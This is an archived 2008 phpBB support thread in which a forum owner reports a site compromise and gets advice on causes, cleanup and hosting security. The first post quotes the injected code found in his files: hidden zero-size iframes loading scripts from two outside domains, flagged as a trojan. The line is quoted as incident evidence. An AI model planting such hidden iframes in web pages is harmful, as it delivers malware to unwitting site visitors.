Found a trojan on my board

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Found a trojan on my board

Post by Remon » Thu Oct 02, 2008 5:41 pm

The last couple of days, multiple visitors from my phpBB forum reporting to me that they get some strange request to install Realplayer and open PDF files.

That sounded strange to me, because HTML posting is disabled.

First i thought that the computers from the visitors where infected with spyware, trojans and other crap. But i'm getting over and over new reports, even from visitors with alternative browsers and Linux as the operating system.

So i decided to do some research, login with a FTP client to my host and this is what i found:

Infected files, all changed on september 28, exactly on 4:34:00 AM:

/index.php
/admin/index.php
/cache/index.htm
/db/index.htm
/docs/CHANGELOG.html
/docs/codingstandards.htm
/docs/FAQ.html
/docs/INSTALL.html
/docs/README.html
/images/index.htm
/images/avatars/index.htm
/images/avatars/galery/index.htm
/includes/index.htm
/includes/page_header.php
/language/index.htm
/language/dutch/index.htm
/language/dutch/email/index.htm
/language/english/index.htm
/language/english/email/index.htm
/templates/index.htm
/templates/subSilver/index.htm
/templates/subSilver/admin/index.htm
/templates/subSilver/images/index.htm
/templates/subSilver/index.htm
/templates/subSilver_old/admin/index.htm
/templates/subSilver_old/images/index.htm

With the following code added on the last line:

Code: Select all

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
While tried to download one of these files, my virusscanner (McAfee) detected the trojan "JS/Tenia.d".

All files has set the CHMOD to 644. Pretty save isn't it?

I have backups, i can put everything back to normal, but i'm afraid that this can be happen again. I've also contacted my hosting provider, maybe there's a trojan or worm into there servers.

This trojan is maybe writen to infect phpBB boards, because there is one stranger in the infected files, the page_header.php. That is typically a file for a phpBB board.

Other usefull information:
Board is running phpBB 2.0.23
Address is http://www.radiohobby.nl that is temporarily offline for above reasons.
Last edited by ric323 on Thu Oct 09, 2008 9:45 pm, edited 1 time in total.
Reason: Topic icon changed

User avatar
JimA
Community Team Leader
Community Team Leader
Posts: 7634
Joined: Thu Jul 31, 2008 5:54 am
Location: The Netherlands
Name: Jim Mossing Holsteyn
Contact:

Re: Found a trojan on my board

Post by JimA » Thu Oct 02, 2008 5:53 pm

Well, when I see this it seems to me that you're hacked. :(
Try to post a report in the Incident tracker and give all information you think that can help you and see what will happend and what they say.
Image Jim Mossing Holsteyn - Community Team Leader
Knowledge Base | Documentation | Board rules

If you're having any questions about the rules/customs of this website, feel free to drop me a PM.

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Thu Oct 02, 2008 7:01 pm

I've found out that .htm/.html/.php files in non public folders on the server also are infected.

Have to wait now untill the hoster replies to me...

dkinzer
Registered User
Posts: 21
Joined: Mon Sep 05, 2005 3:20 am
Location: Portland, OR

Re: Found a trojan on my board

Post by dkinzer » Fri Oct 03, 2008 6:07 pm

Remon wrote:I've found out that .htm/.html/.php files in non public folders on the server also are infected.
It is quite likely that you have a keylogger trojan or some other type of malware on the PC that you use to upload files to your host. By this means, the hackers can get your account's username/password and then modify files at will.

The first step is to change your account's master password and the password on all FTP logins that have the capability to modify files in the directories where you've found evidence. However, you must do this on a system that is known to be virus/trojan-free or it will be to no avail.

You should also review the state of your PC's security software. If it is outdated or if you are missing some key elements, you should take immediate steps to rectify that.
Don Kinzer
ZBasic Microcontrollers
http://www.zbasic.net

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Fri Oct 03, 2008 11:25 pm

Everything is maximum secured on my PC's.

Today i did a phonecall to the hosting company, they told me that this issue is known and that over 50.000 pages are infected and 750 customers have the same problems as me...

They can't find the process that causes this, so they still searching. The CEO even came back early from his holiday...

In the meanwhile they also running a script that cut the iframe out all of the pages, but that's a temporary solution because the process can change the files again on every suddenly time.

espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Re: Found a trojan on my board

Post by espicom » Sat Oct 04, 2008 2:12 am

Classic sign of a compromised file manager on the server. The host didn't keep up with security updates, and someone managed to gain access to all files because of it. Older versions of cPanel have had this problem, and other file managers, too.

You're going to have to wait on the host, because anything you do is going to be overwritten by the next attack. The host has to secure the file manager and clean all the trojan horse programs out. I hope you have a recent, pre-attack backup of all your files and data, or that they do!
Jeff
Fixing 1016/1030/1034 Errors | (obsolete link) | MySQL 4.1/5.x Client Error | phpBBv2 Logo in ACP
Support requests via PM are ignored!
"To be fully alive is to feel that everything is possible." - Eric Hoffer

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Sat Oct 04, 2008 2:49 am

Thanks for your kindly reply!

I have a backup for the files on the host, but is there any change that the database is infected? The last SQL backup i made is dated the 22nd of September. On 2 October i've disabled my board, that's meaning 10 days of lost... :(

espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Re: Found a trojan on my board

Post by espicom » Sat Oct 04, 2008 4:13 am

There is always a possibility, but the particular type of attack made (replacing index.* with infecting code) usually does not go after databases. It's a wild-card replacement of code, rather than specific programs to attack particular applications. Do a back up immediately, either way, because you can always clean out any infected messages or re-work any changed settings.
Jeff
Fixing 1016/1030/1034 Errors | (obsolete link) | MySQL 4.1/5.x Client Error | phpBBv2 Logo in ACP
Support requests via PM are ignored!
"To be fully alive is to feel that everything is possible." - Eric Hoffer

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Thu Oct 09, 2008 9:22 pm

My host cleaned up all the files and they found a solution that this issue cannot happen again.

User avatar
ric323
Former Team Member
Posts: 22909
Joined: Tue Feb 06, 2007 12:33 am
Location: Melbourne, Australia
Name: Ric
Contact:

Re: Found a trojan on my board

Post by ric323 » Thu Oct 09, 2008 9:44 pm

Remon wrote:My host cleaned up all the files and they found a solution that this issue cannot happen again.
That means that they finally updated their old copy of the CPANEL application.
(CPANEL fixed it over two years ago...)
The Knowledge Base contains solutions to many common problems!
How to fix "Doesn't have a default value" and "Incorrect string value: xxx for column 'post_text' " errors.
How to do a clean re-install of the latest phpBB3 version.
Problems with permissions? Read phpBB3 Permissions

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Fri Oct 10, 2008 2:51 pm

I'm not sure about that.

They disabled the allow_url_include in the php.ini, because php scripts can't open external links/images anymore... The update checker in the ACP didn't work with that and my (upgraded to 3.0.2) board cannot get image information from external pictures to set the width and hight...

Another ticked is made for the customer support...

espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Re: Found a trojan on my board

Post by espicom » Mon Oct 13, 2008 12:06 am

You are right to be suspicious if they think disabling URL includes "fixes" the problem. Properly configured, even if PHP can include a URL outside the local machine, the web server should not be running at a privilege level that would allow it to overwrite any files that are not specifically set aside as "writable", nor would it be able to create any files outside of directories specifically set to allow that (i.e., the avatar upload directory, if you've enable that feature).

And yet, someone was able to overwrite index.php... which means whatever method allowed access, it was running NOT as the same user as the web server SHOULD be running (a non-privileged user).

Keep your backups VERY current. And shop for a host that knows how to deal with security.
Jeff
Fixing 1016/1030/1034 Errors | (obsolete link) | MySQL 4.1/5.x Client Error | phpBBv2 Logo in ACP
Support requests via PM are ignored!
"To be fully alive is to feel that everything is possible." - Eric Hoffer

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Mon Oct 13, 2008 2:13 am

It's getting worse then worse, the host is blocking everything with a firewall. PhpBB cannot read picture sizes and returns an error to the members...

And i just paid like 200 euro for October 2008 to October 2009... :cry:

Locked

Return to “2.0.x Support Forum”